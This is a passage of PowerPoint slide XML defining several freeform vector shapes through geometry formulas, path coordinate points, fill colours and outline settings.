                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35878" name="Freeform 412"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3045" y="2198"/>
                <a:ext cx="28" cy="63"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 28"/>
                  <a:gd name="T1" fmla="*/ 63 h 63"/>
                  <a:gd name="T2" fmla="*/ 13 w 28"/>
                  <a:gd name="T3" fmla="*/ 61 h 63"/>
                  <a:gd name="T4" fmla="*/ 12 w 28"/>
                  <a:gd name="T5" fmla="*/ 57 h 63"/>
                  <a:gd name="T6" fmla="*/ 8 w 28"/>
                  <a:gd name="T7" fmla="*/ 53 h 63"/>
                  <a:gd name="T8" fmla="*/ 1 w 28"/>
                  <a:gd name="T9" fmla="*/ 48 h 63"/>
                  <a:gd name="T10" fmla="*/ 1 w 28"/>
                  <a:gd name="T11" fmla="*/ 47 h 63"/>
                  <a:gd name="T12" fmla="*/ 3 w 28"/>
                  <a:gd name="T13" fmla="*/ 47 h 63"/>
                  <a:gd name="T14" fmla="*/ 3 w 28"/>
                  <a:gd name="T15" fmla="*/ 45 h 63"/>
                  <a:gd name="T16" fmla="*/ 1 w 28"/>
                  <a:gd name="T17" fmla="*/ 41 h 63"/>
                  <a:gd name="T18" fmla="*/ 4 w 28"/>
                  <a:gd name="T19" fmla="*/ 35 h 63"/>
                  <a:gd name="T20" fmla="*/ 2 w 28"/>
                  <a:gd name="T21" fmla="*/ 33 h 63"/>
                  <a:gd name="T22" fmla="*/ 4 w 28"/>
                  <a:gd name="T23" fmla="*/ 28 h 63"/>
                  <a:gd name="T24" fmla="*/ 2 w 28"/>
                  <a:gd name="T25" fmla="*/ 25 h 63"/>
                  <a:gd name="T26" fmla="*/ 3 w 28"/>
                  <a:gd name="T27" fmla="*/ 21 h 63"/>
                  <a:gd name="T28" fmla="*/ 5 w 28"/>
                  <a:gd name="T29" fmla="*/ 21 h 63"/>
                  <a:gd name="T30" fmla="*/ 5 w 28"/>
                  <a:gd name="T31" fmla="*/ 16 h 63"/>
                  <a:gd name="T32" fmla="*/ 3 w 28"/>
                  <a:gd name="T33" fmla="*/ 16 h 63"/>
                  <a:gd name="T34" fmla="*/ 1 w 28"/>
                  <a:gd name="T35" fmla="*/ 15 h 63"/>
                  <a:gd name="T36" fmla="*/ 1 w 28"/>
                  <a:gd name="T37" fmla="*/ 11 h 63"/>
                  <a:gd name="T38" fmla="*/ 0 w 28"/>
                  <a:gd name="T39" fmla="*/ 7 h 63"/>
                  <a:gd name="T40" fmla="*/ 2 w 28"/>
                  <a:gd name="T41" fmla="*/ 2 h 63"/>
                  <a:gd name="T42" fmla="*/ 4 w 28"/>
                  <a:gd name="T43" fmla="*/ 0 h 63"/>
                  <a:gd name="T44" fmla="*/ 9 w 28"/>
                  <a:gd name="T45" fmla="*/ 1 h 63"/>
                  <a:gd name="T46" fmla="*/ 12 w 28"/>
                  <a:gd name="T47" fmla="*/ 1 h 63"/>
                  <a:gd name="T48" fmla="*/ 12 w 28"/>
                  <a:gd name="T49" fmla="*/ 1 h 63"/>
                  <a:gd name="T50" fmla="*/ 15 w 28"/>
                  <a:gd name="T51" fmla="*/ 4 h 63"/>
                  <a:gd name="T52" fmla="*/ 20 w 28"/>
                  <a:gd name="T53" fmla="*/ 13 h 63"/>
                  <a:gd name="T54" fmla="*/ 20 w 28"/>
                  <a:gd name="T55" fmla="*/ 14 h 63"/>
                  <a:gd name="T56" fmla="*/ 21 w 28"/>
                  <a:gd name="T57" fmla="*/ 16 h 63"/>
                  <a:gd name="T58" fmla="*/ 20 w 28"/>
                  <a:gd name="T59" fmla="*/ 20 h 63"/>
                  <a:gd name="T60" fmla="*/ 20 w 28"/>
                  <a:gd name="T61" fmla="*/ 26 h 63"/>
                  <a:gd name="T62" fmla="*/ 22 w 28"/>
                  <a:gd name="T63" fmla="*/ 32 h 63"/>
                  <a:gd name="T64" fmla="*/ 28 w 28"/>
                  <a:gd name="T65" fmla="*/ 38 h 63"/>
                  <a:gd name="T66" fmla="*/ 27 w 28"/>
                  <a:gd name="T67" fmla="*/ 38 h 63"/>
                  <a:gd name="T68" fmla="*/ 24 w 28"/>
                  <a:gd name="T69" fmla="*/ 46 h 63"/>
                  <a:gd name="T70" fmla="*/ 21 w 28"/>
                  <a:gd name="T71" fmla="*/ 50 h 63"/>
                  <a:gd name="T72" fmla="*/ 17 w 28"/>
                  <a:gd name="T73" fmla="*/ 54 h 63"/>
                  <a:gd name="T74" fmla="*/ 13 w 28"/>
                  <a:gd name="T75" fmla="*/ 63 h 63"/>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8"/>
                  <a:gd name="T115" fmla="*/ 0 h 63"/>
                  <a:gd name="T116" fmla="*/ 28 w 28"/>
                  <a:gd name="T117" fmla="*/ 63 h 63"/>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8" h="63">
                    <a:moveTo>
                      <a:pt x="13" y="63"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="63"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35879" name="Freeform 413"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3045" y="2198"/>
                <a:ext cx="28" cy="63"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 28"/>
                  <a:gd name="T1" fmla="*/ 63 h 63"/>
                  <a:gd name="T2" fmla="*/ 13 w 28"/>
                  <a:gd name="T3" fmla="*/ 61 h 63"/>
                  <a:gd name="T4" fmla="*/ 12 w 28"/>
                  <a:gd name="T5" fmla="*/ 57 h 63"/>
                  <a:gd name="T6" fmla="*/ 8 w 28"/>
                  <a:gd name="T7" fmla="*/ 53 h 63"/>
                  <a:gd name="T8" fmla="*/ 1 w 28"/>
                  <a:gd name="T9" fmla="*/ 48 h 63"/>
                  <a:gd name="T10" fmla="*/ 1 w 28"/>
                  <a:gd name="T11" fmla="*/ 47 h 63"/>
                  <a:gd name="T12" fmla="*/ 3 w 28"/>
                  <a:gd name="T13" fmla="*/ 47 h 63"/>
                  <a:gd name="T14" fmla="*/ 3 w 28"/>
                  <a:gd name="T15" fmla="*/ 45 h 63"/>
                  <a:gd name="T16" fmla="*/ 1 w 28"/>
                  <a:gd name="T17" fmla="*/ 41 h 63"/>
                  <a:gd name="T18" fmla="*/ 4 w 28"/>
                  <a:gd name="T19" fmla="*/ 35 h 63"/>
                  <a:gd name="T20" fmla="*/ 2 w 28"/>
                  <a:gd name="T21" fmla="*/ 33 h 63"/>
                  <a:gd name="T22" fmla="*/ 4 w 28"/>
                  <a:gd name="T23" fmla="*/ 28 h 63"/>
                  <a:gd name="T24" fmla="*/ 2 w 28"/>
                  <a:gd name="T25" fmla="*/ 25 h 63"/>
                  <a:gd name="T26" fmla="*/ 3 w 28"/>
                  <a:gd name="T27" fmla="*/ 21 h 63"/>
                  <a:gd name="T28" fmla="*/ 5 w 28"/>
                  <a:gd name="T29" fmla="*/ 21 h 63"/>
                  <a:gd name="T30" fmla="*/ 5 w 28"/>
                  <a:gd name="T31" fmla="*/ 16 h 63"/>
                  <a:gd name="T32" fmla="*/ 3 w 28"/>
                  <a:gd name="T33" fmla="*/ 16 h 63"/>
                  <a:gd name="T34" fmla="*/ 1 w 28"/>
                  <a:gd name="T35" fmla="*/ 15 h 63"/>
                  <a:gd name="T36" fmla="*/ 1 w 28"/>
                  <a:gd name="T37" fmla="*/ 11 h 63"/>
                  <a:gd name="T38" fmla="*/ 0 w 28"/>
                  <a:gd name="T39" fmla="*/ 7 h 63"/>
                  <a:gd name="T40" fmla="*/ 2 w 28"/>
                  <a:gd name="T41" fmla="*/ 2 h 63"/>
                  <a:gd name="T42" fmla="*/ 4 w 28"/>
                  <a:gd name="T43" fmla="*/ 0 h 63"/>
                  <a:gd name="T44" fmla="*/ 9 w 28"/>
                  <a:gd name="T45" fmla="*/ 1 h 63"/>
                  <a:gd name="T46" fmla="*/ 12 w 28"/>
                  <a:gd name="T47" fmla="*/ 1 h 63"/>
                  <a:gd name="T48" fmla="*/ 12 w 28"/>
                  <a:gd name="T49" fmla="*/ 1 h 63"/>
                  <a:gd name="T50" fmla="*/ 15 w 28"/>
                  <a:gd name="T51" fmla="*/ 4 h 63"/>
                  <a:gd name="T52" fmla="*/ 20 w 28"/>
                  <a:gd name="T53" fmla="*/ 13 h 63"/>
                  <a:gd name="T54" fmla="*/ 20 w 28"/>
                  <a:gd name="T55" fmla="*/ 14 h 63"/>
                  <a:gd name="T56" fmla="*/ 21 w 28"/>
                  <a:gd name="T57" fmla="*/ 16 h 63"/>
                  <a:gd name="T58" fmla="*/ 20 w 28"/>
                  <a:gd name="T59" fmla="*/ 20 h 63"/>
                  <a:gd name="T60" fmla="*/ 20 w 28"/>
                  <a:gd name="T61" fmla="*/ 26 h 63"/>
                  <a:gd name="T62" fmla="*/ 22 w 28"/>
                  <a:gd name="T63" fmla="*/ 32 h 63"/>
                  <a:gd name="T64" fmla="*/ 28 w 28"/>
                  <a:gd name="T65" fmla="*/ 38 h 63"/>
                  <a:gd name="T66" fmla="*/ 27 w 28"/>
                  <a:gd name="T67" fmla="*/ 38 h 63"/>
                  <a:gd name="T68" fmla="*/ 24 w 28"/>
                  <a:gd name="T69" fmla="*/ 46 h 63"/>
                  <a:gd name="T70" fmla="*/ 21 w 28"/>
                  <a:gd name="T71" fmla="*/ 50 h 63"/>
                  <a:gd name="T72" fmla="*/ 17 w 28"/>
                  <a:gd name="T73" fmla="*/ 54 h 63"/>
                  <a:gd name="T74" fmla="*/ 13 w 28"/>
                  <a:gd name="T75" fmla="*/ 63 h 63"/>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8"/>
                  <a:gd name="T115" fmla="*/ 0 h 63"/>
                  <a:gd name="T116" fmla="*/ 28 w 28"/>
                  <a:gd name="T117" fmla="*/ 63 h 63"/>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8" h="63">
                    <a:moveTo>
                      <a:pt x="13" y="63"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="63"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35880" name="Freeform 414"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3065" y="2202"/>
                <a:ext cx="38" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 38 w 38"/>
                  <a:gd name="T1" fmla="*/ 24 h 34"/>
                  <a:gd name="T2" fmla="*/ 34 w 38"/>
                  <a:gd name="T3" fmla="*/ 25 h 34"/>
                  <a:gd name="T4" fmla="*/ 30 w 38"/>
                  <a:gd name="T5" fmla="*/ 27 h 34"/>
                  <a:gd name="T6" fmla="*/ 26 w 38"/>
                  <a:gd name="T7" fmla="*/ 27 h 34"/>
                  <a:gd name="T8" fmla="*/ 23 w 38"/>
                  <a:gd name="T9" fmla="*/ 27 h 34"/>
                  <a:gd name="T10" fmla="*/ 21 w 38"/>
                  <a:gd name="T11" fmla="*/ 28 h 34"/>
                  <a:gd name="T12" fmla="*/ 18 w 38"/>
                  <a:gd name="T13" fmla="*/ 32 h 34"/>
                  <a:gd name="T14" fmla="*/ 14 w 38"/>
                  <a:gd name="T15" fmla="*/ 33 h 34"/>
                  <a:gd name="T16" fmla="*/ 8 w 38"/>
                  <a:gd name="T17" fmla="*/ 34 h 34"/>
                  <a:gd name="T18" fmla="*/ 2 w 38"/>
                  <a:gd name="T19" fmla="*/ 28 h 34"/>
                  <a:gd name="T20" fmla="*/ 0 w 38"/>
                  <a:gd name="T21" fmla="*/ 22 h 34"/>
                  <a:gd name="T22" fmla="*/ 0 w 38"/>
                  <a:gd name="T23" fmla="*/ 16 h 34"/>
                  <a:gd name="T24" fmla="*/ 1 w 38"/>
                  <a:gd name="T25" fmla="*/ 12 h 34"/>
                  <a:gd name="T26" fmla="*/ 0 w 38"/>
                  <a:gd name="T27" fmla="*/ 10 h 34"/>
                  <a:gd name="T28" fmla="*/ 1 w 38"/>
                  <a:gd name="T29" fmla="*/ 10 h 34"/>
                  <a:gd name="T30" fmla="*/ 3 w 38"/>
                  <a:gd name="T31" fmla="*/ 10 h 34"/>
                  <a:gd name="T32" fmla="*/ 3 w 38"/>
                  <a:gd name="T33" fmla="*/ 9 h 34"/>
                  <a:gd name="T34" fmla="*/ 4 w 38"/>
                  <a:gd name="T35" fmla="*/ 9 h 34"/>
                  <a:gd name="T36" fmla="*/ 3 w 38"/>
                  <a:gd name="T37" fmla="*/ 8 h 34"/>
                  <a:gd name="T38" fmla="*/ 4 w 38"/>
                  <a:gd name="T39" fmla="*/ 6 h 34"/>
                  <a:gd name="T40" fmla="*/ 4 w 38"/>
                  <a:gd name="T41" fmla="*/ 5 h 34"/>
                  <a:gd name="T42" fmla="*/ 6 w 38"/>
                  <a:gd name="T43" fmla="*/ 5 h 34"/>
                  <a:gd name="T44" fmla="*/ 8 w 38"/>
                  <a:gd name="T45" fmla="*/ 4 h 34"/>
                  <a:gd name="T46" fmla="*/ 9 w 38"/>
                  <a:gd name="T47" fmla="*/ 4 h 34"/>
                  <a:gd name="T48" fmla="*/ 9 w 38"/>
                  <a:gd name="T49" fmla="*/ 3 h 34"/>
                  <a:gd name="T50" fmla="*/ 10 w 38"/>
                  <a:gd name="T51" fmla="*/ 4 h 34"/>
                  <a:gd name="T52" fmla="*/ 11 w 38"/>
                  <a:gd name="T53" fmla="*/ 4 h 34"/>
                  <a:gd name="T54" fmla="*/ 12 w 38"/>
                  <a:gd name="T55" fmla="*/ 5 h 34"/>
                  <a:gd name="T56" fmla="*/ 13 w 38"/>
                  <a:gd name="T57" fmla="*/ 5 h 34"/>
                  <a:gd name="T58" fmla="*/ 13 w 38"/>
                  <a:gd name="T59" fmla="*/ 5 h 34"/>
                  <a:gd name="T60" fmla="*/ 12 w 38"/>
                  <a:gd name="T61" fmla="*/ 4 h 34"/>
                  <a:gd name="T62" fmla="*/ 13 w 38"/>
                  <a:gd name="T63" fmla="*/ 4 h 34"/>
                  <a:gd name="T64" fmla="*/ 14 w 38"/>
                  <a:gd name="T65" fmla="*/ 3 h 34"/>
                  <a:gd name="T66" fmla="*/ 15 w 38"/>
                  <a:gd name="T67" fmla="*/ 2 h 34"/>
                  <a:gd name="T68" fmla="*/ 16 w 38"/>
                  <a:gd name="T69" fmla="*/ 2 h 34"/>
                  <a:gd name="T70" fmla="*/ 17 w 38"/>
                  <a:gd name="T71" fmla="*/ 2 h 34"/>
                  <a:gd name="T72" fmla="*/ 18 w 38"/>
                  <a:gd name="T73" fmla="*/ 2 h 34"/>
                  <a:gd name="T74" fmla="*/ 19 w 38"/>
                  <a:gd name="T75" fmla="*/ 2 h 34"/>
                  <a:gd name="T76" fmla="*/ 20 w 38"/>
                  <a:gd name="T77" fmla="*/ 2 h 34"/>
                  <a:gd name="T78" fmla="*/ 21 w 38"/>
                  <a:gd name="T79" fmla="*/ 0 h 34"/>
                  <a:gd name="T80" fmla="*/ 21 w 38"/>
                  <a:gd name="T81" fmla="*/ 1 h 34"/>
                  <a:gd name="T82" fmla="*/ 22 w 38"/>
                  <a:gd name="T83" fmla="*/ 1 h 34"/>
                  <a:gd name="T84" fmla="*/ 23 w 38"/>
                  <a:gd name="T85" fmla="*/ 1 h 34"/>
                  <a:gd name="T86" fmla="*/ 23 w 38"/>
                  <a:gd name="T87" fmla="*/ 0 h 34"/>
                  <a:gd name="T88" fmla="*/ 24 w 38"/>
                  <a:gd name="T89" fmla="*/ 1 h 34"/>
                  <a:gd name="T90" fmla="*/ 25 w 38"/>
                  <a:gd name="T91" fmla="*/ 1 h 34"/>
                  <a:gd name="T92" fmla="*/ 25 w 38"/>
                  <a:gd name="T93" fmla="*/ 1 h 34"/>
                  <a:gd name="T94" fmla="*/ 26 w 38"/>
                  <a:gd name="T95" fmla="*/ 0 h 34"/>
                  <a:gd name="T96" fmla="*/ 28 w 38"/>
                  <a:gd name="T97" fmla="*/ 0 h 34"/>
                  <a:gd name="T98" fmla="*/ 28 w 38"/>
                  <a:gd name="T99" fmla="*/ 0 h 34"/>
                  <a:gd name="T100" fmla="*/ 28 w 38"/>
                  <a:gd name="T101" fmla="*/ 0 h 34"/>
                  <a:gd name="T102" fmla="*/ 28 w 38"/>
                  <a:gd name="T103" fmla="*/ 1 h 34"/>
                  <a:gd name="T104" fmla="*/ 29 w 38"/>
                  <a:gd name="T105" fmla="*/ 3 h 34"/>
                  <a:gd name="T106" fmla="*/ 34 w 38"/>
                  <a:gd name="T107" fmla="*/ 6 h 34"/>
                  <a:gd name="T108" fmla="*/ 37 w 38"/>
                  <a:gd name="T109" fmla="*/ 10 h 34"/>
                  <a:gd name="T110" fmla="*/ 38 w 38"/>
                  <a:gd name="T111" fmla="*/ 14 h 34"/>
                  <a:gd name="T112" fmla="*/ 38 w 38"/>
                  <a:gd name="T113" fmla="*/ 19 h 34"/>
                  <a:gd name="T114" fmla="*/ 38 w 38"/>
                  <a:gd name="T115" fmla="*/ 22 h 34"/>
                  <a:gd name="T116" fmla="*/ 38 w 38"/>
                  <a:gd name="T117" fmla="*/ 24 h 3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38"/>
                  <a:gd name="T178" fmla="*/ 0 h 34"/>
                  <a:gd name="T179" fmla="*/ 38 w 38"/>
                  <a:gd name="T180" fmla="*/ 34 h 3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38" h="34">
                    <a:moveTo>
                      <a:pt x="38" y="24"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="34" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
